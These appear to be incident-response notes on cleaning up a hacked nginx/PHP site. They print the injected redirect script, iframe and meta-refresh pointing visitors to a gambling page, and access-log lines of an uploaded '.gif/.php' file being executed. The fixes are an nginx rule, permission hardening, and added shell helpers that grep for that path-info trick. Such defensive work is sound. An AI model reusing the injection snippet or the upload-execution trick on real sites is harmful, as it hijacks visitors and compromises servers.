1. Content injected into the file:
'<script>{
window.location.href="http://www.22hy.com/html/livedealer.html?pid=1"
}</script>
<iframe src="http://www.22hy.com/html/livedealer.html?pid=1" align=center width="1440"
height="6500" ></iframe>
<meta http-equiv="refresh" content="0.1;URL=http://www.18hy.com/html/livedealer.html?pid=1">'
2. Check the timestamps of the modified file
[roots]$ stat index.php.bad
File: "index.php.bad"
Size: 648 Blocks: 8 IO Block: 4096 普通文件
Device: fd00h/64768d Inode: 6553641 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 502/ www) Gid: ( 0/ root)
Access: 2013-12-02 15:12:34.167243911 +0800
Modify: 2013-11-25 11:20:32.659258572 +0800
Change: 2013-11-29 18:24:29.209265041 +0800
3. Check the server (Linux) logs
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 14 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 381 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
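An added example (not from the original notes) that turns the check above into a repeatable scan: a small POSIX shell helper that pulls out of an nginx access log every request whose path is a static-looking file name followed by a .php suffix, exactly the shape of the two log lines above, and summarises client IP and path for triage. It assumes the default "combined" log format (the request path is field 7) and GNU grep/awk; the sample log it writes is constructed from the two entries above plus two benign requests.

```shell
#!/bin/sh
# Added example, not part of the original notes. Flags nginx access-log
# requests that use the "/file.gif/.php" path-info trick seen in step 3.
# Assumes the default "combined" log format (path is field 7).

# Print every request line whose path is a non-PHP file name followed by
# "/<anything>.php", e.g. /uc_server/data/tmp/upload30540323.gif/.php
flag_pathinfo_requests() {
    # $1: access log file
    grep -E '"(GET|POST|HEAD) [^" ]+\.(gif|jpe?g|png|bmp|txt)/[^" ]*\.php' "$1"
}

# Count offending requests per (client IP, path) for triage; most frequent first.
pathinfo_summary() {
    flag_pathinfo_requests "$1" | awk '{print $1, $7}' | sort | uniq -c | sort -rn
}

# Constructed sample log: the two entries from step 3 plus two benign requests.
write_sample_log() {
    # $1: destination file
    cat > "$1" <<'EOF'
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 14 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 381 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
10.0.0.5 - - [25/Nov/2013:14:41:00 +0800] "GET /forum.php?mod=viewthread&tid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [25/Nov/2013:14:42:00 +0800] "GET /static/logo.gif HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
}

# Usage: scan a real log given as the first argument, or the constructed
# sample when no path is given.
LOG=${1:-}
if [ -z "$LOG" ]; then
    LOG=$(mktemp)
    write_sample_log "$LOG"
fi
echo "Suspicious requests in $LOG:"
pathinfo_summary "$LOG"
```

Run it against the real access log (`sh scan.sh /var/log/nginx/access.log`, path assumed) and every hit is a candidate upload to inspect with the same stat/timestamp check used in step 2; a 200 response on such a request, as in the two lines above, means the backend did execute something.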
4. Block the vulnerability based on the log evidence
location ~ ^(.+\.php)(.*)$
{
    # Capture the resolved file path up to the last ".php"; for a request like
    # /uc_server/data/tmp/upload30540323.gif/.php this leaves a path that does
    # not exist on disk.
    if ($request_filename ~* (.*)\.php) {
        set $php_url $1;
    }
    # Refuse the request unless that .php file really exists, so the FastCGI
    # backend is never handed a missing script and falls back to executing the
    # preceding path component (the uploaded .gif). Setting cgi.fix_pathinfo=0
    # in php.ini closes the same hole on the PHP side.
    if (!-e $php_url.php) {
        return 403;
    }
    fastcgi_pass unix:/tmp/php-cgi.sock;
    fastcgi_index index.php;
    fastcgi_split_path_info ^(.+\.php)(.*)$;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
    include fastcgi.conf;
}
5. Change the permissions of the server files: the cache directory has write permission; PHP files have only read and execute permission.
6. Change the users: nginx is started as root, the nginx worker processes access files as the www user, and the directories are owned by a different user.
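An added example (not from the original notes) that audits a web root against the permission model of steps 5 and 6 and applies the step 5 hardening: it lists PHP files that still carry a write bit, lists files in the writable upload/cache directories that contain a PHP open tag regardless of their extension (the .gif-named script from step 3 would show up here), and strips write bits from PHP files. It requires GNU find and grep; the web root, the directory name uc_server/data/tmp and the demo file names are assumptions for the example, and the demo tree it builds is constructed.

```shell
#!/bin/sh
# Added example, not part of the original notes. Audits a web root against the
# permission model in steps 5 and 6: PHP files read+execute only, and only the
# cache/upload directories writable by the worker user. Requires GNU find/grep.
# The web root and directory names below are assumptions for the example.

# PHP files that still carry any write bit (owner, group or other).
# Expected output after hardening: nothing.
writable_php_files() {
    # $1: web root
    find "$1" -type f -name '*.php' -perm /0222
}

# Files inside the writable (upload/cache) directories that contain a PHP open
# tag, whatever their extension. Expected output on a clean tree: nothing.
php_tagged_uploads() {
    # $1: web root; remaining arguments: writable directories relative to it
    root=$1; shift
    for d in "$@"; do
        grep -rl -- '<?php' "$root/$d" 2>/dev/null || :
    done
}

# Hardening for step 5: strip every write bit from PHP files, leaving r-x.
lock_php_files() {
    # $1: web root
    find "$1" -type f -name '*.php' -exec chmod a-w {} +
}

# Constructed demo tree: one writable PHP file, one already locked, one PHP
# file disguised as a GIF in the upload directory, and one real GIF.
make_demo_root() {
    # $1: directory to populate
    mkdir -p "$1/uc_server/data/tmp"
    printf '<?php echo "hello";\n' > "$1/index.php"
    chmod 0755 "$1/index.php"
    printf '<?php echo "admin";\n' > "$1/admin.php"
    chmod 0555 "$1/admin.php"
    printf '<?php echo "not a gif";\n' > "$1/uc_server/data/tmp/upload.gif"
    printf 'GIF89a real image bytes\n' > "$1/uc_server/data/tmp/real.gif"
}

# Usage: audit a real web root given as the first argument, or the constructed
# demo tree when none is given.
ROOT=${1:-}
if [ -z "$ROOT" ]; then
    ROOT=$(mktemp -d)
    make_demo_root "$ROOT"
fi
echo "Writable PHP files under $ROOT:"
writable_php_files "$ROOT"
echo "Files with PHP code in upload/cache dirs:"
php_tagged_uploads "$ROOT" uc_server/data/tmp
```

Run the two list functions from cron or after each deployment; with the nginx rule from step 4 in place, a PHP-tagged file in the upload directory cannot be executed through the path-info trick, but its presence is still the clearest sign that the upload filter was bypassed and is worth checking against the access log.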
References:
http://zhumeng8337797.blog.163.com/blog/static/1007689142011815642384/
http://blog.phpdr.net/nginx-try-files.html